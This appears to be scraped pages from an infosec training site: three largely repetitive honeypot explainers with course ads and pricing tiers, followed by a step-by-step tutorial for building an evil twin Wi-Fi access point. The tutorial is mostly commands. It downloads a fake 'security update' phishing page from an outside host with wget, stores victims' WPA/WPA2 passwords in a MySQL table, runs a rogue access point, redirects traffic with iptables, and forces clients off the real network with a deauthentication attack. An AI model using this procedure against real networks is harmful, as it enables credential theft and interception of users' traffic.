How can we Define a Honeypot?

 

How can we define honeypots?

A honeypot is essentially a computer system. In this computer system, there exists files and directories just like any other usual computer system. A honeypot aims to attract an attacker to fall into its trap for it to investigate his actions and follow his behavior. In fact, a honeypot is not an actual system yet; it is a fake system. The difference between a honeypot and other security systems lies in the fact that a variety of security problems could be tackled at once using diverse approaches available on honeypots. On the contrary, other usual security systems are used to tackle one certain problem through a proposed solution. An instance of this point could be simply seen in the scenario when a compromised system could be investigated after having a log of malicious activity. At the same time, new threats could be recognized through implementing a honeypot in a network and hence attempt to tackle these problems and overcome them effectively.

 

Honeypots are indistinguishable from the actual production servers to an outside attacker. Thus, they will not behave any differently when attacking them. However, the network security team can monitor the honeypots for recorded attacks and later analyze them. The honeypots can also help to absorb attacks directed against the real server.

 

What is the motivation behind a honeypot?

The honeypot idea is mainly derived from a great interest in the field of computer security. The implementation of a honeypot requires that one is interested to know the workflow of security systems and to build a solid knowledge of how the protection of a company could be achieved and how security flaws in a system can be very risky for the entire system and organization. A network administrator shall be ready for great work ahead while implementing the honeypot system in a network. Being aware of the system and network architecture and the modifications that could be applied to them is a very crucial step beforehand. The output is examined through some reliable forensic science tools. In the meanwhile, several problems will be encountered, and the administrator has to make sure he can solve them before putting the honeypot in the system. Facing such problems beforehand will be very important for the administrator. This ensures that at a later that time, although the conditions may be intense, the system will be handled quickly, and losses will be easily recovered. Therefore, good knowledge of examining security problems and forensic science information is a must.

 

What should be done before applying a honeypot to the real production system?

A network administrator should carry out some research by the time he thinks of applying the honeypot concept in the network. He has to be sure that the created honeypot is secured such that it has no leaks into the actual system. Otherwise, it will make a real disaster. On the other hand, he has to make sure that a hacker has no knowledge about being trapped into a honeypot. He has also to be aware of the maximum amount of information available for an attacker to get through the honeypot implementation. Also, it is good to know the behavior of an attacker when he knows that he is in a trap. Will that attacker just give up hacking and stop his actions? It is also really important for a network administrator to be knowledgeable of the location where the honeypot should be deployed in the network and the amount of information he can get.

Laws always play a role in everything in life. Therefore, it is also advisable that a network administrator should be aware of the restrictions applied on implementing honeypots; especially if his organization is in the European Union (EU) or the United State of America (USA). There are certain rules and regulations which govern the process of obtaining information of an attacker or tracking him back. Therefore, a network administrator should abide by these rules by not fully tracking the attacker, and at the same, he should be respectful of the laws in every single way.

What is the description of our problem?

 When we build a good honeypot, we expect to attract several attackers into the fake system and let them take control over the intentional flaws left in there. When we trace the hacker, it is not guaranteed for sure whether we will be the ones who have the control. Thus, we don’t know that much about the security of a honeypot. We are not sure whether the attacker, in fact, knows that it is a fake system. We also doubt whether the attacker is aware of the great importance of acquiring information about the system flaws. We need to be very specific and certain about the actual limits that an attacker has whenever he gets the control over the honeypot system. It will be disappointing if the attacker can even exploit the honeypot itself and seize a flaw in it to get to the system and do what he wants in the system. The entire system will be compromised when an attacker gets to this devastating point. Another entitled problem is that an attacker may recognize that it is a trap and then stop hacking or pretend that he is hacking. In that time, it is no longer beneficial to have the installed honeypot anymore, and it is not useful either to use our forensics tool to investigate the system. A very important aspect to consider when using honeypots is to be sure about the answers for all these questions and attempt to get our honeypots to be more secure and be assured that hacking the honeypot by the attacker will not yield any useful data for him about the actual system. A good network administrator should play the role of a hacker once and of a forensic examiner on another occasion or simultaneously do the same of course with his own team. Very accurate results could be acquired depending on various tools used for hacking and forensics.

Try Certified Ethical Hacker for FREE!!!https://infosecaddicts.com/course/certified-ethical-hacker-v10/

Resources:

http://www.diva-portal.org/smash/get/diva2:327476/fulltext01

https://www2.cs.arizona.edu/~collberg/Teaching/466-566/2012/Resources/presentations/2012/topic12-final/report.pdf

Novice
$0
Join the infosec family! Your journey starts here. The free tier gives you limited access to our training materials.
Regular use
$49
This is the second tier that includes limited access to our training materials and to our exclusive lab.  
Risky use
$69
This third tier gives you all the luxuries of the Free use and more. You have access to self-paced classes.  
Monthly use
$89
This last tier gives you the Free, Social and Problem use for just $89 a month. Plus you will save $29!!!  

What are the Types of Honeypots?

 

A honeypot is essentially a computer system. In this computer system, there exists some files and directories like any other usual computer system. A honeypot aims to attract an attacker to fall into its trap and investigate his actions and follow his behavior. In fact, a honeypot is not an actual system but an intentionally made fake system.

 What are the types of honeypots?

 

Looking at the aims of honeypots and their levels of interactions, it is possible for us to group them into two main types: Research honeypots and Production honeypots:

  1. Research honeypots:

Military, research and government organizations mainly depend on these types of honeypots. A huge amount of data is contained in this type of honeypots. These honeypots are familiar with any new threats, and Blackhat motives could easily be recognized through such honeypots. While the main benefit of research honeypots is to understand how a system could become more secure, these types of honeypots cannot give any valuable data about increasing the security of an organization and its vulnerabilities.

  1. Production honeypots:

These types of honeypots are mainly utilized for the sake of getting an organization to become more protected against any potential attacks. The implementation of such honeypots is performed mainly inside the organization’s production network itself. The aim for them is to help increase the overall security for an organization at the end of the day.

Through such honeypots, a limited amount of data is captured such that honeypots that are lowly interactive are used. In this process, the behavior of an attacker is monitored very carefully by the proper forensics tools, such that any possible risks may be lowered and hence the organization becomes more secure consequently. These types of honeypots are the ones that are mostly used in practice, yet sometimes they may represent a risk for the organization themselves.

One thing that matters about these types of honeypots is where and how they are to be implemented by network administrators. Remember that the implementation of honeypots is essentially within a real network and system. Testing these sorts of honeypots usually yields several unexpected actions or problems.

Consequently, some other systems inside an organization may be put in danger when implementing these honeypots in the network. For an administrator, he should be fully aware that other systems will be possibly misused through the honeypots. As a result of that, he should make sure that all other systems inside the organization are secured enough after deploying the features of the honeypot. Otherwise, some great problem is to be faced by the entire organization eventually.

How to categorize honeypots according to the type of data collection?

There is, in fact, a way to classify honeypots, depending mainly on the type of data that is collected by the honeypot concerning a certain attack. A honeypot can be set up to detect and record one or more types of data: events (things that happen which change something in the honeypot), attacks (attempts by a malicious user to exploit a vulnerability), and intrusions (successful attacks that penetrate the honeypot). There is no judgment over how important a type of data is over another. However, most honeypots can display some information from each data category of the groups as mentioned earlier. In fact, all of these categories are really important for a security administrator to understand an attack and know the vulnerabilities of a system.

 

Is the usage of honeypots considered legal or not?

There are some legal issues that one should be fully aware of by the time he gets to deploy a honeypot inside an organization network or so. In fact, such legal issues are variant according to the governing rules and according to the country where a honeypot is to be deployed and configured. The regulations determine many different aspects, but mainly they care much about three main aspects which are the security of data, data collection, and the way in which honeypots are used in an organization.

These diverse laws mainly rely heavily on the quality of the data captured by a honeypot and on the person who is implementing and deploying the honeypot inside the network in the first place. The main significant issue when it comes to legalizing the usage of honeypots rely on the type of collected data and the content of it. This makes it harder for someone to determine whether using honeypots is considered a legal aspect. This is because legalizing it or not mainly depends on what the data is intended to be used for after collecting it. This mainly leaves us with several steps that one should carefully consider by the time he deploys a honeypot inside the network.

A lot of questions and approaches should be asked during the experiment as well. Things are no different when it comes to using a honeypot for a company, or for home, yet for a company, there are several other responsibilities that a network administrator should consider and take care of greatly. A network administrator is responsible for both the country laws and the company laws that come next.

It is a must to abide by these laws to remain in legal status. While some companies allow experimenting almost everything inside the company, many more other companies put several restrictions on experimenting such things within the company. By the time a honeypot is deployed, someone has to be sure about the answers of the legality of honeypots inside the company and the country as well. One has to ask the responsible ones to make sure that what he is doing does not violate current rules set by either the country or of course the company. In this regard, there are in fact three main legal issues that should be considered regarding using honeypots. The three are privacy, entrapment and civil liability

Try Certified Ethical Hacker for FREE!!!https://infosecaddicts.com/course/certified-ethical-hacker-v10/

Resources:

http://www.diva-portal.org/smash/get/diva2:327476/fulltext01

https://www2.cs.arizona.edu/~collberg/Teaching/466-566/2012/Resources/presentations/2012/topic12-final/report.pdf

Novice
$0
Join the infosec family! Your journey starts here. The free tier gives you limited access to our training materials.
Regular use
$49
This is the second tier that includes limited access to our training materials and to our exclusive lab.  
Risky use
$69
This third tier gives you all the luxuries of the Free use and more. You have access to self-paced classes.  
Monthly use
$89
This last tier gives you the Free, Social and Problem use for just $89 a month. Plus you will save $29!!!  

 

Phases and Usages of a Honeypot

 

 

 

 

 

How can we define honeypots?

A honeypot is essentially a computer system. In this computer system, there exists some files and directories like any other usual computer system. A honeypot aims to attract an attacker to fall into its trap and investigate his actions and follow his behavior. In fact, a honeypot is not an actual system yet; it is a fake intentionally made system. The difference between a honeypot and other security systems lies in the fact that a variety of security problems could be tackled at once using diverse approaches by depending on honeypots.

On the contrary, other usual security systems are used to tackle one certain problem through a proposed solution. An instance of this point could be simply seen in the scenario when a compromised system is investigated after having a log of malicious activity. At the same time, new threats could be recognized through implementing a honeypot in a network and hence an attempt to tackle these problems and overcome them effectively.

To an outside attacker, the honeypots are indistinguishable from the actual production servers. Thus, the servers will not behave any differently when attacking them. However, the network security team can monitor the honeypots for recorded attacks and later analyze them. The honeypots can also help to absorb attacks directed against the real server.

 

What is the motivation behind a honeypot?

The honeypot idea is mainly derived from a great interest in the field of computer security as a whole. The implementation of a honeypot requires that one is interested to know the workflow of security systems and to build a solid knowledge of how the protection of a company could be achieved and how security flaws in a system may be very risky for the entire system and organization. A network administrator shall be ready for a great work ahead of him while implementing the honeypot system in a network. Being aware of the system and network architecture and the modifications that could be applied to them is a very crucial step beforehand.

The output shall be examined through some reliable forensic science tools. In the meanwhile, several problems will be encountered, and the administrator has to make sure he can solve them before putting the honeypot in the system. Facing such problems before actually facing them, in reality, will be very important for the administrator. Of course, at that time, although the conditions may be intense, the system will be handled quickly, and losses will be easily recovered. Therefore, good knowledge of both examination of security problems and forensic science information is a must.

 

What should be done before applying a honeypot to the real production system?

In fact, there has to be some research carried out by the network administrator by the time he even thinks of applying the honeypot concept in the network. He has to be sure that the created honeypot is secured such that it has no leaks into the actual system. Otherwise, it will make a real disaster. On the other hand, he has to make sure that a hacker has no knowledge about being trapped into a honeypot.

He has also to be aware of the maximum amount of information available for an attacker to get through the honeypot implementation. Also, it is good to know the behavior of an attacker when he knows that he is in a trap. Will that attacker just give up hacking and stop his actions? It is also really important for a network administrator to be knowledgeable of the location where the honeypot should be deployed in the network and the amount of information he can get.

Laws always play a role in everything in life. Therefore, it is also advisable that a network administrator should be aware of the restrictions applied on implementing honeypots especially if his organization is in the European Union (EU) or the United State of America (USA). There are certain rules and regulations which govern the process of obtaining information of an attacker or tracking him back. Therefore, a network administrator should abide by these rules by not fully tracking the attacker, and at the same, he should be respectful of the laws in every single way.

 

What is the description of our problem? 

When we build a good honeypot, we expect to attract several attackers into the fake system and let them take control over the intentional flaws left in there. When we trace the hacker, it is not guaranteed for sure that we will be the ones who have the control. Thus, we don’t know much about the security of a honeypot. We are not sure whether the attacker, in fact, knows that it is a fake system.

Additionally, we doubt whether the attacker is aware of the great importance of acquiring information about the system flaws. We need to be very specific and certain about the actual limits that an attacker has whenever he gets the control over the honeypot system. It will be disappointing if the attacker can even exploit the honeypot itself and seize a flaw in it to get to the system and do what they want in the system.

The entire system will be compromised when an attacker gets to this devastating point. Another entitled problem is that an attacker may recognize that it is a trap and then stop hacking or pretend that he is hacking. During such a time, it is no longer beneficial to have the installed honeypot anymore, and it is not useful either to use our forensics tool to investigate the system.

A very important aspect to consider when using honeypots is to be sure about the answers for all these questions and attempt to get our honeypots to be more secure and be assured that hacking the honeypot by the attacker will not yield any useful data for him about the actual system. A good network administrator should play the role of a hacker once and of a forensic examiner on another occasion or simultaneously of course with his own team. Very accurate results may be outputted then by depending on various tools for hacking and forensics purposes.

Try Certified Ethical Hacker for FREE!!!https://infosecaddicts.com/course/certified-ethical-hacker-v10/

Resources:

http://www.diva-portal.org/smash/get/diva2:327476/fulltext01

https://www2.cs.arizona.edu/~collberg/Teaching/466-566/2012/Resources/presentations/2012/topic12-final/report.pdf

Novice
$0
Join the infosec family! Your journey starts here. The free tier gives you limited access to our training materials.
Regular use
$49
This is the second tier that includes limited access to our training materials and to our exclusive lab.  
Risky use
$69
This third tier gives you all the luxuries of the Free use and more. You have access to self-paced classes.  
Monthly use
$89
This last tier gives you the Free, Social and Problem use for just $89 a month. Plus you will save $29!!!  

How can you Create an Evil Twin Access Point?

 

Quick intro to Evil Twin:

What is an evil twin access point? Basically, when it comes to security and especially Wi-Fi security, the name evil twin access point arises greatly. Basically, an attacker can imitate an actual Wi-Fi access point for the sake of getting to collect data from whoever attempts to access the network.

Installing a Wi-Fi access point with the same name and settings of another access point, and setting the access point and positioning it next to the impersonated one will most likely cause the victim user to fall in the trap. Since the two access points become twins, in fact, identical twins per say, the user will hardly be able to distinguish between the two access points and will try to access the evil access point as if it is the original one. This is because the signal strengths may be similar or even at times, the evil access point can be having the stronger signal.

Now, there are two cases: it is either the user’s device will connect automatically to an access point, which is in this case the evil access point, or the user will manually choose the stronger access point perceiving it as, the nearer one. In both cases, all the user’s sensitive data such as passwords will get intercepted by the attacker.

What do you need to set up an evil twin access point?

To be able to set up an evil twin access point, there are four main requirements:

  1. Have Kali Linux installed on your machine.
  2. Have a Wireless Network adapter.
  3. Have your machine connected to the Internet.
  4. Have a target access point.

What are the steps to accomplish the desired task?

The following steps work as a concise way to get an evil twin access point prepared for an attack:

  1. Get your Kali Linux machine opened and logged in
  2. Get the Internet connection established between your machine and the host machine.
  3. Get a DHCP server installed on your machine: this can be done by opening the terminal and typing: “apt-get install dhcp3-server “
  4. After the installation is done successfully, get the DHCP server configured with the following command:

“ nano/etc/dhcpd.conf”

A blank file should get opened into the terminal right away after executing this command.

  1. Inside the blank file, type the following, type the following lines as they are:

authoritative;

default-lease-time 600;

max-lease-time 7200;

subnet 192.168.1.128 netmask 255.255.255.128 {

option subnet-mask 255.255.255.128;

option broadcast-address 192.168.1.255;

option routers 192.168.1.129;

option domain-name-servers 8.8.8.8;

range 192.168.1.130 192.168.1.140;

}

  1. Save the file by pressing on ctrl+x and then press ‘y’
  2. You get to set the security update page downloaded; this page is the one which will appear when the user opens the browser. To be able to accomplish this task, you should change the directory to /var/www. You can simply type the following command for this sake:

“cd /var/www”

  1. Now that you changed the work directory, you get to type the following commands in their order:

rm index.html

wget http://hackthistv.com/eviltwin.zip

unzip eviltwin.zip

rm eviltwin.zip

  1. Get the apache server opened now and mysql as well. The following commands respectively should do this task for you:

/etc/init.d/apache2 start

/etc/init.d/mysql start

  1. Get a database created to be able to store the users’ WPA/WPA2 passwords when they enter the security update page. The following commands are very effective to do this task for you now:

mysql -u root

create database evil_twin;

use evil_twin

create table wpa_keys(password varchar(64), confirm varchar(64));

Don’t close the MySQL page or terminal after this step.

  1. Get to know the interface name of the local network adapter and know the local IP as well. To do that, get a new separate terminal opened and type the following commands inside it:

ip route

airmon-ng

airmon-ng start wlan0

clear

when you type the first command of this list: (take note of local IP n wired interface): the interface name is the one which appears after “eth0” and the local IP appears after “src”

  1. Type the following commands now:

airodump-ng-oui-update

airodump-ng -M mon0 (take note of the target essid,bssid and channel number which all appear after this command)

airbase-ng -e [ESSID] -c [ch. #] -P mon0 (such that [ESSID] is your target’s ESSID and [ch. #] is the target’s channel no which you took note of after the previous command)

  1. Now, the evil access point is awesomely running. However, we need to get to configure our tunnel interface to be able to create a bridge between our evil twin access point and the wired interface. The name of our tunnel interface is at0. This was essentially created when we used “airbase” in the last step. To make such configurations, get a new separate terminal opened without closing neither the MySQL nor the airbase terminals. The following command should be typed into the new terminal now:

ifconfig at0 192.168.1.129 netmask 255.255.255.128

  1. A routing table has to be added now such that IP forwarding gets enabled. This way, traffic can go into and from our evil access point successfully. The following commands should be typed respectively to get this task done:

route add -net 192.168.1.128 netmask 255.255.255.128 gw 192.168.1.129

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables –table nat –append POSTROUTING –out-interface eth0 -j MASQUERADE

iptables –append FORWARD –in-interface at0 -j ACCEPT

iptables -t nat -A PREROUTING -p tcp –dport 80 -j DNAT –to-destination [LOCALIP ADDRESS:80]

iptables -t nat -A POSTROUTING -j MASQUERADE

dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0

etc/init.d/iscdhcp-server start

  1. Perform a De-authentication attack now. This will make it compulsory for all the connected clients to connect to the evil twin access point. We need first of all to get a blacklist file created, to contain BSSID of the target. The following command will be doing this task for you:

echo [BSSID] > blacklist

NOTE:[BSSID] BSSID of the target

mdk3 mon0 d -b blacklist -c [CH.#]

  1. Get back to the airbase terminal; there you will know whether a user is connected to the evil twin access point. He will have entered his WPA/WPA2 password by then. To view this password, get back to the MySQL terminal and type the following commands:

use evil_twin

select * from wpa_keys; {To view the password entered by the victim in our MySQL database}

  1. Congratulations! You have created the evil twin access point successfully.

Try Certified Ethical Hacker for FREE!!!https://infosecaddicts.com/course/certified-ethical-hacker-v10/

Sources:

www.hacking-tutorial.com/hacking-tutorial/how-to-create-evil-twin-access-point/#sthash.rDbO247S.dpbs

Novice
$0
Join the infosec family! Your journey starts here. The free tier gives you limited access to our training materials.
Regular use
$49
This is the second tier that includes limited access to our training materials and to our exclusive lab.  
Risky use
$69
This third tier gives you all the luxuries of the Free use and more. You have access to self-paced classes.  
Monthly use
$89
This last tier gives you the Free, Social and Problem use for just $89 a month. Plus you will save $29!!!